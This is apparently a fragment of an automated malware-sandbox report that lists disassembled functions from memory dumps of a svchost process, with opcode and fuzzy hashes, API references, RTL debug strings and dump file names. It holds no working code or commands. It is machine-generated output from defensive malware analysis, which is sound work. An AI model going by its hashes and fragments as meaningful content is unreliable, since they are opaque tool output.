                                                                        • Instruction ID: 500a430ecd6e8a603e56fcd3d3d0ca1709eda35d9053f14df8333e05cd389bdd
                                                                        • Opcode Fuzzy Hash: 38d9de2bd5d68b9d22f3905dcbaf2d0b2a99242a0acd0263f59817186a547686
                                                                        • Instruction Fuzzy Hash: D8E18C31A04B41DFD724CF28C884B6AB7E4BB44314F180A5EF9A58F3A1D775D949CB4A
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 034A7BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 034A7B7F
                                                                        • RTL: Resource at %p, xrefs: 034A7B8E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                                        • Instruction ID: 744f114dd1256efbd74b17aaf5c9c18e0a9d0bafc8693eca25f5ba6320665f04
                                                                        • Opcode Fuzzy Hash: c813fac53e79939e7bb44130736654a8397e5e0490ac7cfa967e43b15b27aa1f
                                                                        • Instruction Fuzzy Hash: 7D41E5353007029FC728DE2ACC40B6BB7E9EB98710F14091EE956DF790D731E4058B9A
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034A728C
                                                                        Strings
                                                                        • RTL: Re-Waiting, xrefs: 034A72C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 034A7294
                                                                        • RTL: Resource at %p, xrefs: 034A72A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                                        • Instruction ID: 86e0366dad6b11ba8a6465968d3d7410d6f35a5f7bbe669803305ce7843c7ec0
                                                                        • Opcode Fuzzy Hash: 97fbdf91e9992b2d152f3593f8fa0b2421b6c8445247565f1ec57a1f7e57c24c
                                                                        • Instruction Fuzzy Hash: 3D41E136700A06AFC720DE6ACC41B6ABBA5FB94714F14462BF855DF380DB21F81687D9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-
                                                                        • API String ID: 1302938615-2137968064
                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction ID: 3797f2461f9603d70e8fd521aef8a8712ad08115261ae9cbbc3048cfe937b5e3
                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                        • Instruction Fuzzy Hash: 9B918170E002169EDB24DF69C981AFFBBA5AF44720F98451BE865EF3D0D73099428B58
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                                        • Instruction ID: ab6d1f0bf04d725aa5249a3fc28d94c7fe4129c2b41d4a5fb15b4e3b71714d27
                                                                        • Opcode Fuzzy Hash: 3d3a6df4a55a9d22efad0b02051240eda7e941a3c43e449110ee5704ea889b29
                                                                        • Instruction Fuzzy Hash: D5814B76D002699BEB31CF54CC44BEEB6B4AB09710F0445EBE919BB290D7709E85CFA4
                                                                        APIs
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 034BCFBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750522021.0000000003529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000352D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.000000000359E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3400000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8
                                                                        • String ID: @$@4Cw@4Cw
                                                                        • API String ID: 4062629308-3101775584
                                                                        • Opcode ID: 2a30a1edc8bfe871ecaba4ab18783712042292f0be744d4f4a67eccdf261066a
                                                                        • Instruction ID: d8673e1b50d7549f4fd3a54e175278ac9f8885952cd28c1a89e94d069ad56271
                                                                        • Opcode Fuzzy Hash: 2a30a1edc8bfe871ecaba4ab18783712042292f0be744d4f4a67eccdf261066a
                                                                        • Instruction Fuzzy Hash: 93418E79A00224DFDB21DF99D880AAEBBB8FF46B04F04446BE914DF264D774D801CB69
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4750254248.0000000003100000.00000004.00000020.00020000.00000000.sdmp, Offset: 03100000, based on PE: true
                                                                        • Associated: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750429967.00000000032A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750475286.0000000003350000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4750522021.0000000003400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_3100000_svchost.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Inst$Null$soft$vy
                                                                        • API String ID: 0-1924780883
                                                                        • Opcode ID: 02d86b5b1373c700681cc002a9141567cb2ed731372a064938ce2e39d3abefd5
                                                                        • Instruction ID: c066463629a153f71c1fb99ebf4b9bf02e9b4a9cf6988dda996910655b34910a
                                                                        • Opcode Fuzzy Hash: 02d86b5b1373c700681cc002a9141567cb2ed731372a064938ce2e39d3abefd5
                                                                        • Instruction Fuzzy Hash: 0B51E575901308ABDB10DF75DD89B9D7BA8FB0D354F248826E904BB2D0DBF489428B65